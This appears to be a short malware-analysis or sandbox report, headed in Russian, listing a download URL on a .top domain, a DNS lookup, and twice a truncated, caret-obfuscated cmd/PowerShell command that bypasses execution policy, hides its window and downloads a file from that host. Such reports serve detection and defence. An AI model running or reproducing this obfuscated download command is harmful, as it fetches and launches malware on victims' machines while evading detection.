Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OWeRshe^lL.e^x^e ^-e^xec^utioNP^OLIcy By^pa^Ss^ -no^PRoFile -w^I^NDowSt^y^lE HiDDen (nE^w^-oBJ^E^c^t SyST^em^.^nET^.^web^cl^I^ENt).^DO^wNLOAd^fIl^e^(^'http://www.fapoergol.top/rea...
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /c "p^OWeRshe^lL.e^x^e ^-e^xec^utioNP^OLIcy By^pa^Ss^ -no^PRoFile -w^I^NDowSt^y^lE HiDDen (nE^w^-oBJ^E^c^t SyST^em^.^nET^.^web^cl^I^ENt).^DO^wNLOAd^fIl^e^(^'http://www.fapoergol.top/rea...' (со скрытым окном)